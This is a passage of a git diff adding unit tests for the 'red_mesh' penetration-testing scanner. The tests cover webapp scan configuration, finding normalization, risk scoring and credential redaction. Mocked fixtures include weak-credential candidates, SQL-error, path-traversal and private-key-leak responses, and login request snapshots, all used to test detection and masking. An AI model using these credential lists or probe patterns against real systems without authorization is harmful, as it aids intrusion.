"/login/"}) + self.assertTrue(cfg.allow_stateful_probes) + + # Round-trip + restored = JobConfig.from_dict(cfg.to_dict()) + self.assertEqual(restored.scan_type, cfg.scan_type) + self.assertEqual(restored.target_url, cfg.target_url) + self.assertEqual(restored.official_username, cfg.official_username) + self.assertEqual(restored.weak_candidates, cfg.weak_candidates) + self.assertEqual(restored.allow_stateful_probes, cfg.allow_stateful_probes) + + def test_graybox_defaults(self): + """All graybox fields have sensible defaults.""" + cfg = JobConfig( + target="x", start_port=1, end_port=1, + exceptions=[], distribution_strategy="SLICE", + port_order="SEQUENTIAL", nr_local_workers=1, + enabled_features=[], excluded_features=[], + run_mode="SINGLEPASS", + ) + self.assertEqual(cfg.scan_type, "network") + self.assertEqual(cfg.target_url, "") + self.assertEqual(cfg.official_username, "") + self.assertEqual(cfg.official_password, "") + self.assertEqual(cfg.regular_username, "") + self.assertEqual(cfg.regular_password, "") + self.assertIsNone(cfg.weak_candidates) + self.assertEqual(cfg.max_weak_attempts, 5) + self.assertIsNone(cfg.app_routes) + self.assertTrue(cfg.verify_tls) + self.assertIsNone(cfg.target_config) + self.assertFalse(cfg.allow_stateful_probes) + + def test_redaction_masks_passwords(self): + """to_dict() includes passwords; redaction must happen at API level.""" + cfg = JobConfig( + target="x", start_port=1, end_port=1, + exceptions=[], distribution_strategy="SLICE", + port_order="SEQUENTIAL", nr_local_workers=1, + enabled_features=[], excluded_features=[], + run_mode="SINGLEPASS", + official_password="secret", + regular_password="pass", + weak_candidates=["admin:admin"], + ) + d = cfg.to_dict() + # Passwords are present in to_dict() (redaction is at the API level) + self.assertEqual(d["official_password"], "secret") + self.assertEqual(d["regular_password"], "pass") + self.assertEqual(d["weak_candidates"], ["admin:admin"]) + + def test_redact_job_config_masks_credentials(self): + """_redact_job_config masks passwords and weak_candidates.""" + from extensions.business.cybersec.red_mesh.mixins.report import _ReportMixin + d = { + "target": "x", + "official_username": "admin", + "official_password": "secret", + "regular_username": "user", + "regular_password": "pass", + "weak_candidates": ["admin:admin", "test:test"], + } + redacted = _ReportMixin._redact_job_config(d) + self.assertEqual(redacted["official_password"], "***") + self.assertEqual(redacted["regular_password"], "***") + self.assertEqual(redacted["weak_candidates"], ["***", "***"]) + # Usernames are NOT masked + self.assertEqual(redacted["official_username"], "admin") + self.assertEqual(redacted["regular_username"], "user") + + def test_redact_job_config_noop_when_empty(self): + """_redact_job_config is a no-op when credential fields are empty/absent.""" + from extensions.business.cybersec.red_mesh.mixins.report import _ReportMixin + d = {"target": "x", "official_password": "", "regular_password": ""} + redacted = _ReportMixin._redact_job_config(d) + self.assertEqual(redacted["official_password"], "") + self.assertEqual(redacted["regular_password"], "") + + +class TestUiAggregateGraybox(unittest.TestCase): + + def test_graybox_fields_default(self): + """UiAggregate graybox fields default to 0 / 'network'.""" + ui = UiAggregate(total_open_ports=[], total_services=0, total_findings=0) + self.assertEqual(ui.scan_type, "network") + self.assertEqual(ui.total_routes_discovered, 0) + self.assertEqual(ui.total_forms_discovered, 0) + self.assertEqual(ui.total_scenarios, 0) + self.assertEqual(ui.total_scenarios_vulnerable, 0) + + def test_graybox_fields_roundtrip(self): + """UiAggregate graybox fields round-trip.""" + ui = UiAggregate( + total_open_ports=[443], total_services=1, total_findings=5, + scan_type="webapp", total_routes_discovered=12, + total_forms_discovered=3, total_scenarios=8, + total_scenarios_vulnerable=2, + ) + d = ui.to_dict() + restored = UiAggregate.from_dict(d) + self.assertEqual(restored.scan_type, "webapp") + self.assertEqual(restored.total_routes_discovered, 12) + self.assertEqual(restored.total_forms_discovered, 3) + self.assertEqual(restored.total_scenarios, 8) + self.assertEqual(restored.total_scenarios_vulnerable, 2) + + +class TestScanMetricsGraybox(unittest.TestCase): + + def test_scenario_fields_default(self): + """ScanMetrics scenario counters default to 0.""" + m = ScanMetrics() + self.assertEqual(m.scenarios_total, 0) + self.assertEqual(m.scenarios_vulnerable, 0) + self.assertEqual(m.scenarios_clean, 0) + self.assertEqual(m.scenarios_inconclusive, 0) + self.assertEqual(m.scenarios_error, 0) + + def test_scenario_fields_roundtrip(self): + """ScanMetrics scenario counters round-trip.""" + m = ScanMetrics( + scenarios_total=10, scenarios_vulnerable=3, + scenarios_clean=5, scenarios_inconclusive=1, + scenarios_error=1, + ) + d = m.to_dict() + restored = ScanMetrics.from_dict(d) + self.assertEqual(restored.scenarios_total, 10) + self.assertEqual(restored.scenarios_vulnerable, 3) + self.assertEqual(restored.scenarios_clean, 5) + self.assertEqual(restored.scenarios_inconclusive, 1) + self.assertEqual(restored.scenarios_error, 1) + + +class TestFindingUnchanged(unittest.TestCase): + """Verify blackbox Finding stays backward-compatible.""" + + def test_finding_has_expected_fields(self): + """Finding keeps legacy fields and adds optional CVSS metadata only.""" + import dataclasses + fields = dataclasses.fields(Finding) + self.assertEqual( + [f.name for f in fields], + [ + "severity", + "title", + "description", + "evidence", + "remediation", + "owasp_id", + "cwe_id", + "confidence", + "cvss_score", + "cvss_vector", + ], + ) + + def test_finding_no_probe_type(self): + """Finding does not have a probe_type attribute.""" + self.assertFalse(hasattr(Finding, 'probe_type')) + f = Finding(severity=Severity.HIGH, title="Test", description="Desc") + self.assertFalse(hasattr(f, 'probe_type')) + + def test_existing_construction_unchanged(self): + """Existing Finding construction still works.""" + f = Finding( + severity=Severity.CRITICAL, + title="SQL Injection", + description="Found SQL injection in /api/search", + evidence="error-based: syntax error near 'OR'", + remediation="Use parameterized queries", + owasp_id="A03:2021", + cwe_id="CWE-89", + confidence="certain", + ) + self.assertIsNone(f.cvss_score) + self.assertEqual(f.cvss_vector, "") + self.assertEqual(f.severity, Severity.CRITICAL) + self.assertEqual(f.title, "SQL Injection") + self.assertEqual(f.confidence, "certain") + + def test_optional_cvss_metadata_supported(self): + """Finding supports optional CVSS metadata without affecting legacy fields.""" + f = Finding( + severity=Severity.HIGH, + title="Broken Access Control", + description="Privilege escalation path found", + cvss_score=8.8, + cvss_vector="CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H", + ) + self.assertEqual(f.cvss_score, 8.8) + self.assertEqual(f.cvss_vector, "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H") + + +if __name__ == '__main__': + unittest.main() diff --git a/extensions/business/cybersec/red_mesh/tests/test_launch_service.py b/extensions/business/cybersec/red_mesh/tests/test_launch_service.py new file mode 100644 index 00000000..39491f7a --- /dev/null +++ b/extensions/business/cybersec/red_mesh/tests/test_launch_service.py @@ -0,0 +1,121 @@ +import unittest +from unittest.mock import patch + +from extensions.business.cybersec.red_mesh.constants import ( + PORT_ORDER_SEQUENTIAL, + ScanType, +) +from extensions.business.cybersec.red_mesh.services.launch import launch_local_jobs +from extensions.business.cybersec.red_mesh.services.scan_strategy import ScanStrategy + + +class DummyOwner: + def __init__(self): + self.cfg_port_order = PORT_ORDER_SEQUENTIAL + self.cfg_excluded_features = [] + self.cfg_scan_min_rnd_delay = 0.0 + self.cfg_scan_max_rnd_delay = 0.0 + self.cfg_ics_safe_mode = True + self.cfg_scanner_identity = "probe.redmesh.local" + self.cfg_scanner_user_agent = "" + self.cfg_nr_local_workers = 2 + self.messages = [] + + def P(self, message, **_kwargs): + self.messages.append(message) + + +class DummyNetworkWorker: + def __init__(self, *, local_id_prefix, worker_target_ports, **kwargs): + self.local_worker_id = f"worker-{local_id_prefix}" + self.worker_target_ports = worker_target_ports + self.kwargs = kwargs + self.started = False + + def start(self): + self.started = True + + +class DummyWebappWorker: + def __init__(self, *, local_id, target_url, job_config, **kwargs): + self.local_worker_id = local_id + self.target_url = target_url + self.job_config = job_config + self.kwargs = kwargs + self.started = False + + def start(self): + self.started = True + + +class TestLaunchService(unittest.TestCase): + + def test_launch_local_jobs_uses_network_strategy_dispatch(self): + owner = DummyOwner() + strategy = ScanStrategy( + scan_type=ScanType.NETWORK, + worker_cls=DummyNetworkWorker, + catalog_categories=("service",), + ) + + with patch("extensions.business.cybersec.red_mesh.services.launch.get_scan_strategy", return_value=strategy): + local_jobs = launch_local_jobs( + owner, + job_id="job-1", + target="10.0.0.10", + launcher="0xlauncher", + start_port=1, + end_port=4, + job_config={ + "scan_type": "network", + "nr_local_workers": 2, + "port_order": PORT_ORDER_SEQUENTIAL, + }, + ) + + self.assertEqual(len(local_jobs), 2) + self.assertTrue(all(worker.started for worker in local_jobs.values())) + self.assertEqual( + sorted(len(worker.worker_target_ports) for worker in local_jobs.values()), + [2, 2], + ) + + def test_launch_local_jobs_uses_webapp_strategy_dispatch(self): + owner = DummyOwner() + strategy = ScanStrategy( + scan_type=ScanType.WEBAPP, + worker_cls=DummyWebappWorker, + catalog_categories=("graybox",), + ) + + with patch("extensions.business.cybersec.red_mesh.services.launch.get_scan_strategy", return_value=strategy): + local_jobs = launch_local_jobs( + owner, + job_id="job-2", + target="app.internal", + launcher="0xlauncher", + start_port=443, + end_port=443, + job_config={ + "scan_type": "webapp", + "target": "app.internal", + "start_port": 443, + "end_port": 443, + "exceptions": [], + "distribution_strategy": "SLICE", + "port_order": PORT_ORDER_SEQUENTIAL, + "nr_local_workers": 1, + "enabled_features": [], + "excluded_features": [], + "run_mode": "SINGLEPASS", + "target_url": "https://example.com/app", + "official_username": "admin", + "official_password": "secret", + }, + ) + + self.assertEqual(list(local_jobs.keys()), ["1"]) + worker = local_jobs["1"] + self.assertTrue(worker.started) + self.assertEqual(worker.target_url, "https://example.com/app") + self.assertEqual(worker.job_config.scan_type, "webapp") diff --git a/extensions/business/cybersec/red_mesh/tests/test_normalization.py b/extensions/business/cybersec/red_mesh/tests/test_normalization.py new file mode 100644 index 00000000..def0abb9 --- /dev/null +++ b/extensions/business/cybersec/red_mesh/tests/test_normalization.py @@ -0,0 +1,517 @@ +"""Tests for graybox normalization, dispatch, and redaction.""" + +import unittest +from unittest.mock import MagicMock + +from extensions.business.cybersec.red_mesh.graybox.findings import GrayboxFinding +from extensions.business.cybersec.red_mesh.graybox.worker import GrayboxLocalWorker +from extensions.business.cybersec.red_mesh.worker import PentestLocalWorker +from extensions.business.cybersec.red_mesh.constants import ScanType + + +def _make_graybox_report(findings_dicts, port="443"): + """Build a minimal aggregated report with graybox_results.""" + return { + "open_ports": [int(port)], + "port_protocols": {port: "https"}, + "service_info": {}, + "web_tests_info": {}, + "correlation_findings": [], + "graybox_results": { + port: { + "_graybox_test": {"findings": findings_dicts}, + }, + }, + } + + +def _make_mixin(): + """Create a mock host with risk scoring mixin.""" + from extensions.business.cybersec.red_mesh.mixins.risk import _RiskScoringMixin + + class MockHost(_RiskScoringMixin): + pass + + return MockHost() + + +class TestGrayboxNormalization(unittest.TestCase): + + def test_graybox_results_normalized(self): + """GrayboxFinding dicts → flat finding dicts.""" + finding = GrayboxFinding( + scenario_id="PT-A01-01", + title="IDOR detected", + status="vulnerable", + severity="HIGH", + owasp="A01:2021", + cwe=["CWE-639"], + evidence=["endpoint=/api/records/99/", "owner=bob"], + ) + report = _make_graybox_report([finding.to_dict()]) + host = _make_mixin() + risk, flat_findings = host._compute_risk_and_findings(report) + + self.assertEqual(len(flat_findings), 1) + f = flat_findings[0] + self.assertEqual(f["scenario_id"], "PT-A01-01") + self.assertEqual(f["severity"], "HIGH") + self.assertEqual(f["category"], "graybox") + self.assertIn("finding_id", f) + + def test_not_vulnerable_zero_score(self): + """status=not_vulnerable contributes zero risk.""" + finding = GrayboxFinding( + scenario_id="PT-A01-01", + title="No IDOR", + status="not_vulnerable", + severity="HIGH", + owasp="A01:2021", + ) + report = _make_graybox_report([finding.to_dict()]) + host = _make_mixin() + risk, flat_findings = host._compute_risk_and_findings(report) + + # not_vulnerable → severity overridden to INFO → zero weight + f = flat_findings[0] + self.assertEqual(f["severity"], "INFO") + self.assertEqual(f["confidence"], "firm") + # Score should be minimal (only open_ports and breadth contribute) + self.assertLess(risk["breakdown"]["findings_score"], 0.1) + + def test_vulnerable_certain_confidence(self): + """status=vulnerable → confidence=certain.""" + finding = GrayboxFinding( + scenario_id="PT-A01-01", + title="IDOR", + status="vulnerable", + severity="HIGH", + owasp="A01:2021", + ) + report = _make_graybox_report([finding.to_dict()]) + host = _make_mixin() + _, flat_findings = host._compute_risk_and_findings(report) + self.assertEqual(flat_findings[0]["confidence"], "certain") + + def test_inconclusive_tentative(self): + """status=inconclusive → confidence=tentative.""" + finding = GrayboxFinding( + scenario_id="PT-A01-01", + title="Might be IDOR", + status="inconclusive", + severity="MEDIUM", + owasp="A01:2021", + ) + report = _make_graybox_report([finding.to_dict()]) + host = _make_mixin() + _, flat_findings = host._compute_risk_and_findings(report) + self.assertEqual(flat_findings[0]["confidence"], "tentative") + + def test_evidence_joined(self): + """List evidence joined with '; '.""" + finding = GrayboxFinding( + scenario_id="PT-A01-01", + title="Test", + status="vulnerable", + severity="HIGH", + owasp="A01:2021", + evidence=["a=1", "b=2"], + ) + report = _make_graybox_report([finding.to_dict()]) + host = _make_mixin() + _, flat_findings = host._compute_risk_and_findings(report) + self.assertEqual(flat_findings[0]["evidence"], "a=1; b=2") + + def test_typed_evidence_artifacts_survive_normalization(self): + """Graybox typed evidence artifacts survive into the flat finding contract.""" + finding = GrayboxFinding( + scenario_id="PT-A01-01", + title="Typed evidence", + status="vulnerable", + severity="HIGH", + owasp="A01:2021", + evidence=[], + evidence_artifacts=[{"summary": "GET /admin -> 403", "raw_evidence_cid": "QmEvidence"}], + ) + report = _make_graybox_report([finding.to_dict()]) + host = _make_mixin() + _, flat_findings = host._compute_risk_and_findings(report) + self.assertEqual(flat_findings[0]["evidence"], "GET /admin -> 403") + self.assertEqual(flat_findings[0]["evidence_artifacts"][0]["raw_evidence_cid"], "QmEvidence") + + def test_graybox_cvss_metadata_survives_normalization(self): + """Graybox CVSS metadata survives flat finding normalization.""" + finding = GrayboxFinding( + scenario_id="PT-A01-01", + title="Typed CVSS", + status="vulnerable", + severity="HIGH", + owasp="A01:2021", + cvss_score=9.1, + cvss_vector="CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L", + ) + report = _make_graybox_report([finding.to_dict()]) + host = _make_mixin() + _, flat_findings = host._compute_risk_and_findings(report) + self.assertEqual(flat_findings[0]["cvss_score"], 9.1) + self.assertEqual(flat_findings[0]["cvss_vector"], "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L") + + def test_cwe_joined(self): + """List CWEs joined with ', '.""" + finding = GrayboxFinding( + scenario_id="PT-A01-01", + title="Test", + status="vulnerable", + severity="HIGH", + owasp="A01:2021", + cwe=["CWE-639", "CWE-862"], + ) + report = _make_graybox_report([finding.to_dict()]) + host = _make_mixin() + _, flat_findings = host._compute_risk_and_findings(report) + self.assertEqual(flat_findings[0]["cwe_id"], "CWE-639, CWE-862") + + def test_blackbox_and_graybox_combined(self): + """Both sections walked, all in flat_findings.""" + gf = GrayboxFinding( + scenario_id="PT-A01-01", + title="IDOR", + status="vulnerable", + severity="HIGH", + owasp="A01:2021", + ) + report = { + "open_ports": [443], + "port_protocols": {"443": "https"}, + "service_info": { + "443": { + "_service_info_https": { + "findings": [ + {"title": "Weak TLS", "severity": "MEDIUM", "confidence": "firm"}, + ], + }, + }, + }, + "web_tests_info": {}, + "correlation_findings": [], + "graybox_results": { + "443": { + "_graybox_test": {"findings": [gf.to_dict()]}, + }, + }, + } + host = _make_mixin() + _, flat_findings = host._compute_risk_and_findings(report) + # Should have 2 findings: one service, one graybox + self.assertEqual(len(flat_findings), 2) + categories = {f["category"] for f in flat_findings} + self.assertIn("service", categories) + self.assertIn("graybox", categories) + + def test_probe_type_discriminator(self): + """Flat finding has probe_type='graybox'.""" + finding = GrayboxFinding( + scenario_id="PT-A01-01", + title="Test", + status="vulnerable", + severity="HIGH", + owasp="A01:2021", + ) + report = _make_graybox_report([finding.to_dict()]) + host = _make_mixin() + _, flat_findings = host._compute_risk_and_findings(report) + self.assertEqual(flat_findings[0]["probe_type"], "graybox") + + +class TestGrayboxRedaction(unittest.TestCase): + + def test_graybox_redaction(self): + """Credential evidence redacted in graybox_results.""" + from extensions.business.cybersec.red_mesh.mixins.report import _ReportMixin + + class MockHost(_ReportMixin): + pass + + host = MockHost() + report = { + "service_info": {}, + "graybox_results": { + "443": { + "_graybox_weak_auth": { + "findings": [ + { + "scenario_id": "PT-A07-01", + "title": "Weak cred found", + "status": "vulnerable", + "severity": "HIGH", + "evidence": ["admin:password123 accepted"], + }, + ], + }, + }, + }, + } + redacted = host._redact_report(report) + finding = redacted["graybox_results"]["443"]["_graybox_weak_auth"]["findings"][0] + self.assertNotIn("password123", finding["evidence"][0]) + + def test_redaction_handles_special_characters_and_multiple_credential_formats(self): + """Credential redaction masks special-character passwords in both blackbox and graybox evidence.""" + from extensions.business.cybersec.red_mesh.mixins.report import _ReportMixin + + class MockHost(_ReportMixin): + pass + + host = MockHost() + report = { + "service_info": { + "22": { + "_service_info_22": { + "findings": [ + {"evidence": "Accepted credential: admin:p@$$:w0rd!"}, + {"evidence": "Accepted random creds service-user:s3cr3t/with/slash"}, + ], + "accepted_credentials": [ + "admin:p@$$:w0rd!", + "service-user:s3cr3t/with/slash", + ], + }, + }, + }, + "graybox_results": { + "443": { + "_graybox_weak_auth": { + "findings": [ + { + "evidence": [ + "accepted=admin:p@$$:w0rd!", + "candidate service-user:s3cr3t/with/slash worked", + ], + }, + ], + }, + }, + }, + } + + redacted = host._redact_report(report) + service_findings = redacted["service_info"]["22"]["_service_info_22"]["findings"] + service_creds = redacted["service_info"]["22"]["_service_info_22"]["accepted_credentials"] + graybox_evidence = redacted["graybox_results"]["443"]["_graybox_weak_auth"]["findings"][0]["evidence"] + + self.assertNotIn("p@$$:w0rd!", service_findings[0]["evidence"]) + self.assertNotIn("s3cr3t/with/slash", service_findings[1]["evidence"]) + self.assertEqual(service_creds, ["admin:***", "service-user:***"]) + self.assertTrue(all("***" in item for item in graybox_evidence)) + + def test_redaction_masks_graybox_evidence_artifacts(self): + """Typed graybox evidence artifacts are redacted alongside legacy evidence strings.""" + from extensions.business.cybersec.red_mesh.mixins.report import _ReportMixin + + class MockHost(_ReportMixin): + pass + + host = MockHost() + report = { + "service_info": {}, + "graybox_results": { + "443": { + "_graybox_weak_auth": { + "findings": [ + { + "evidence": ["accepted=admin:password123"], + "evidence_artifacts": [ + { + "summary": "accepted=admin:password123", + "request_snapshot": "POST /login username=admin password=password123", + "response_snapshot": "accepted admin:password123", + }, + ], + }, + ], + "artifacts": [ + { + "summary": "candidate=admin:password123", + "request_snapshot": "POST /login password=password123", + "response_snapshot": "200 admin:password123", + }, + ], + }, + }, + }, + } + + redacted = host._redact_report(report) + finding = redacted["graybox_results"]["443"]["_graybox_weak_auth"]["findings"][0] + artifact = finding["evidence_artifacts"][0] + probe_artifact = redacted["graybox_results"]["443"]["_graybox_weak_auth"]["artifacts"][0] + + self.assertNotIn("password123", artifact["summary"]) + self.assertNotIn("password123", artifact["request_snapshot"]) + self.assertNotIn("password123", artifact["response_snapshot"]) + self.assertNotIn("password123", probe_artifact["summary"]) + + +class TestFindingCounting(unittest.TestCase): + + def test_count_all_findings_walks_all_sections(self): + """_count_all_findings counts service, web, correlation, and graybox findings.""" + from extensions.business.cybersec.red_mesh.mixins.report import _ReportMixin + + class MockHost(_ReportMixin): + pass + + host = MockHost() + report = { + "service_info": { + "80": { + "_service_info_http": {"findings": [{"title": "svc-1"}, {"title": "svc-2"}]}, + }, + }, + "web_tests_info": { + "80": { + "_web_test_xss": {"findings": [{"title": "web-1"}]}, + }, + }, + "correlation_findings": [{"title": "corr-1"}], + "graybox_results": { + "443": { + "_graybox_test": {"findings": [{"title": "gb-1"}, {"title": "gb-2"}]}, + }, + }, + } + + self.assertEqual(host._count_all_findings(report), 6) + + +class TestLaunchValidation(unittest.TestCase): + + def test_launch_invalid_scan_type(self): + """Unknown scan_type returns error.""" + try: + ScanType("invalid") + self.fail("Should have raised ValueError") + except ValueError: + pass + + def test_worker_dispatch_table(self): + """ScanType.WEBAPP maps to GrayboxLocalWorker in WORKER_DISPATCH.""" + # Verify the dispatch mapping without importing pentester_api_01 + # (which requires naeural_core). The mapping is: + dispatch = { + ScanType.NETWORK: PentestLocalWorker, + ScanType.WEBAPP: GrayboxLocalWorker, + } + self.assertIs(dispatch[ScanType.WEBAPP], GrayboxLocalWorker) + + def test_worker_dispatch_network(self): + """ScanType.NETWORK maps to PentestLocalWorker in WORKER_DISPATCH.""" + dispatch = { + ScanType.NETWORK: PentestLocalWorker, + ScanType.WEBAPP: GrayboxLocalWorker, + } + self.assertIs(dispatch[ScanType.NETWORK], PentestLocalWorker) + + def test_dispatch_uses_local_worker_id(self): + """Worker stored in scan_jobs by local_worker_id (not local_id).""" + from unittest.mock import patch + with patch("extensions.business.cybersec.red_mesh.graybox.worker.SafetyControls"): + with patch("extensions.business.cybersec.red_mesh.graybox.worker.AuthManager"): + with patch("extensions.business.cybersec.red_mesh.graybox.worker.DiscoveryModule"): + cfg = MagicMock() + cfg.target_url = "http://test.local:8000" + cfg.target_config = None + cfg.verify_tls = True + cfg.scan_min_delay = 0 + worker = GrayboxLocalWorker( + owner=MagicMock(), + job_id="j1", + target_url="http://test.local:8000", + job_config=cfg, + ) + self.assertTrue(worker.local_worker_id.startswith("RM-")) + self.assertNotEqual(worker.local_worker_id, "1") + + def test_probe_kwargs_include_allow_stateful(self): + """allow_stateful passed to all probes.""" + # Verified by testing that probe_kwargs dict is built correctly + from unittest.mock import patch + worker_module = "extensions.business.cybersec.red_mesh.graybox.worker" + + with patch(f"{worker_module}.SafetyControls"): + with patch(f"{worker_module}.AuthManager"): + with patch(f"{worker_module}.DiscoveryModule"): + cfg = MagicMock() + cfg.target_url = "http://test.local:8000" + cfg.target_config = None + cfg.verify_tls = True + cfg.scan_min_delay = 0 + cfg.allow_stateful_probes = True + cfg.excluded_features = [] + cfg.authorized = True + cfg.official_username = "admin" + cfg.official_password = "pass" + cfg.regular_username = "" + cfg.regular_password = "" + cfg.weak_candidates = None + cfg.app_routes = None + + worker = GrayboxLocalWorker( + owner=MagicMock(), + job_id="j1", + target_url="http://test.local:8000", + job_config=cfg, + ) + + worker.safety.validate_target.return_value = None + worker.auth.preflight_check.return_value = None + worker.auth.authenticate.return_value = True + worker.auth.official_session = MagicMock() + worker.auth.regular_session = None + worker.auth._auth_errors = [] + worker.auth.ensure_sessions = MagicMock() + worker.auth.cleanup = MagicMock() + worker.discovery.discover.return_value = ([], []) + + captured_kwargs = {} + + def capturing_cls(**kwargs): + captured_kwargs.update(kwargs) + mock = MagicMock() + mock.run.return_value = [] + return mock + + mock_cls = MagicMock(side_effect=capturing_cls) + mock_cls.is_stateful = False + mock_cls.requires_auth = False + mock_cls.requires_regular_session = False + + with patch(f"{worker_module}.GRAYBOX_PROBE_REGISTRY", + [{"key": "_test", "cls": "test.T"}]): + with patch.object(GrayboxLocalWorker, '_import_probe', staticmethod(lambda cp: mock_cls)): + worker.execute_job() + + self.assertTrue(captured_kwargs.get("allow_stateful")) + + +class TestRiskScoreGraybox(unittest.TestCase): + + def test_risk_score_includes_graybox(self): + """_compute_risk_score also walks graybox_results.""" + finding = GrayboxFinding( + scenario_id="PT-A01-01", + title="IDOR", + status="vulnerable", + severity="HIGH", + owasp="A01:2021", + ) + report = _make_graybox_report([finding.to_dict()]) + host = _make_mixin() + result = host._compute_risk_score(report) + # Should have non-zero findings_score + self.assertGreater(result["breakdown"]["findings_score"], 0) + self.assertGreater(result["breakdown"]["finding_counts"]["HIGH"], 0) + + +if __name__ == '__main__': + unittest.main() diff --git a/extensions/business/cybersec/red_mesh/test_redmesh.py b/extensions/business/cybersec/red_mesh/tests/test_probes.py similarity index 61% rename from extensions/business/cybersec/red_mesh/test_redmesh.py rename to extensions/business/cybersec/red_mesh/tests/test_probes.py index 90a64e16..546904c7 100644 --- a/extensions/business/cybersec/red_mesh/test_redmesh.py +++ b/extensions/business/cybersec/red_mesh/tests/test_probes.py @@ -4,29 +4,7 @@ import unittest from unittest.mock import MagicMock, patch -from extensions.business.cybersec.red_mesh.pentest_worker import PentestLocalWorker - -from xperimental.utils import color_print - -MANUAL_RUN = __name__ == "__main__" - - - -class DummyOwner: - def __init__(self): - self.messages = [] - - def P(self, message, **kwargs): - self.messages.append(message) - if MANUAL_RUN: - if "VULNERABILITY" in message: - color = 'r' - elif any(x in message for x in ["WARNING", "findings:"]): - color = 'y' - else: - color = 'd' - color_print(f"[DummyOwner] {message}", color=color) - return +from .conftest import DummyOwner, MANUAL_RUN, PentestLocalWorker, color_print, mock_plugin_modules class RedMeshOWASPTests(unittest.TestCase): @@ -114,7 +92,7 @@ def fake_get(url, timeout=2, verify=False): return resp with patch( - "extensions.business.cybersec.red_mesh.web_discovery_mixin.requests.get", + "extensions.business.cybersec.red_mesh.worker.web.discovery.requests.get", side_effect=fake_get, ): result = worker._web_test_common("example.com", 80) @@ -126,7 +104,7 @@ def test_cryptographic_failures_cookie_flags(self): resp.headers = {"Set-Cookie": "sessionid=abc; Path=/"} resp.status_code = 200 with patch( - "extensions.business.cybersec.red_mesh.web_hardening_mixin.requests.get", + "extensions.business.cybersec.red_mesh.worker.web.hardening.requests.get", return_value=resp, ): result = worker._web_test_flags("example.com", 443) @@ -140,7 +118,7 @@ def test_injection_sql_detected(self): resp.text = "sql syntax error near line" resp.status_code = 200 with patch( - "extensions.business.cybersec.red_mesh.web_injection_mixin.requests.get", + "extensions.business.cybersec.red_mesh.worker.web.injection.requests.get", return_value=resp, ): result = worker._web_test_sql_injection("example.com", 80) @@ -152,7 +130,7 @@ def test_insecure_design_path_traversal(self): resp.text = "root:x:0:0:root:/root:/bin/bash" resp.status_code = 200 with patch( - "extensions.business.cybersec.red_mesh.web_injection_mixin.requests.get", + "extensions.business.cybersec.red_mesh.worker.web.injection.requests.get", return_value=resp, ): result = worker._web_test_path_traversal("example.com", 80) @@ -164,7 +142,7 @@ def test_security_misconfiguration_missing_headers(self): resp.headers = {"Server": "Test"} resp.status_code = 200 with patch( - "extensions.business.cybersec.red_mesh.web_hardening_mixin.requests.get", + "extensions.business.cybersec.red_mesh.worker.web.hardening.requests.get", return_value=resp, ): result = worker._web_test_security_headers("example.com", 80) @@ -181,10 +159,10 @@ def test_vulnerable_component_banner_exposed(self): resp.headers = {"Server": "Apache/2.2.0"} resp.text = "" with patch( - "extensions.business.cybersec.red_mesh.service_mixin.requests.get", + "extensions.business.cybersec.red_mesh.worker.service.common.requests.get", return_value=resp, ), patch( - "extensions.business.cybersec.red_mesh.service_mixin.requests.request", + "extensions.business.cybersec.red_mesh.worker.service.common.requests.request", side_effect=Exception("skip methods check"), ): worker._gather_service_info() @@ -211,7 +189,7 @@ def quit(self): return None with patch( - "extensions.business.cybersec.red_mesh.service_mixin.ftplib.FTP", + "extensions.business.cybersec.red_mesh.worker.service.common.ftplib.FTP", return_value=DummyFTP(), ): result = worker._service_info_ftp("example.com", 21) @@ -237,7 +215,7 @@ def quit(self): return None with patch( - "extensions.business.cybersec.red_mesh.service_mixin.ftplib.FTP", + "extensions.business.cybersec.red_mesh.worker.service.common.ftplib.FTP", return_value=DummyFTP(), ): result = worker._service_info_ftp("example.com", 2121) @@ -270,7 +248,7 @@ def test_software_data_integrity_secret_leak(self): resp.text = "BEGIN RSA PRIVATE KEY" resp.status_code = 200 with patch( - "extensions.business.cybersec.red_mesh.web_discovery_mixin.requests.get", + "extensions.business.cybersec.red_mesh.worker.web.discovery.requests.get", return_value=resp, ): result = worker._web_test_homepage("example.com", 80) @@ -307,7 +285,7 @@ def fake_get(url, timeout=2, verify=False): return resp with patch( - "extensions.business.cybersec.red_mesh.web_discovery_mixin.requests.get", + "extensions.business.cybersec.red_mesh.worker.web.discovery.requests.get", side_effect=fake_get, ): worker._run_web_tests() @@ -336,6 +314,37 @@ def fake_web_two(target, port): self.assertEqual(web_snap["_web_test_fake_one"], "web-one:10000") self.assertEqual(web_snap["_web_test_fake_two"], "web-two:10000") + def test_correlation_runs_all_enabled_methods(self): + owner, worker = self._build_worker(ports=[80]) + + marker = [] + + def fake_corr_one(): + marker.append("one") + + def fake_corr_two(): + marker.append("two") + + setattr(worker, "_post_scan_fake_one", fake_corr_one) + setattr(worker, "_post_scan_fake_two", fake_corr_two) + worker._PentestLocalWorker__enabled_features = ["_post_scan_fake_one", "_post_scan_fake_two"] + + worker._run_correlation_tests() + + self.assertEqual(marker, ["one", "two"]) + + def test_execute_job_uses_explicit_phase_plan(self): + _, worker = self._build_worker() + phases = [] + + def record_phase(phase_config): + phases.append(phase_config["phase"]) + + with patch.object(worker, "_execute_phase", side_effect=record_phase): + worker.execute_job() + + self.assertEqual(phases, [entry["phase"] for entry in worker.PHASE_EXECUTION_PLAN]) + def test_ssrf_protection_respects_exceptions(self): owner, worker = self._build_worker(ports=[80, 9000], exceptions=[9000]) self.assertNotIn(9000, worker.state["ports_to_scan"]) @@ -348,7 +357,7 @@ def test_cross_site_scripting_detection(self): resp.text = f"Response with {payload} inside" resp.status_code = 200 with patch( - "extensions.business.cybersec.red_mesh.web_injection_mixin.requests.get", + "extensions.business.cybersec.red_mesh.worker.web.injection.requests.get", return_value=resp, ): result = worker._web_test_xss("example.com", 80) @@ -416,13 +425,13 @@ def mock_ssl_context(protocol=None): return DummyContextUnverified() with patch( - "extensions.business.cybersec.red_mesh.service_mixin.socket.create_connection", + "extensions.business.cybersec.red_mesh.worker.service.tls.socket.create_connection", return_value=DummyConn(), ), patch( - "extensions.business.cybersec.red_mesh.service_mixin.ssl.SSLContext", + "extensions.business.cybersec.red_mesh.worker.service.tls.ssl.SSLContext", return_value=DummyContextUnverified(), ), patch( - "extensions.business.cybersec.red_mesh.service_mixin.ssl.create_default_context", + 